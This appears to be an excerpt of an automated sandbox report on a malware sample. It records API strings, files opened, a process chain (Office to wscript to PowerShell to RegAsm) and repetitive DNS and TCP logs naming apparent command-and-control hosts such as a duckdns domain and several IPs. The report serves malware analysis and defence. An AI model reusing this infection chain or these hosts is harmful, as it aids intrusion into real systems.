                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407877 FindFirstFileW,FindNextFileW,19_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044E8F9 FindFirstFileExA,19_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_10006580 FindFirstFileExA,19_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,19_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: raw.githubusercontent.com
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: m2g.me
                    Source: global trafficDNS query: name: ugnrv.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
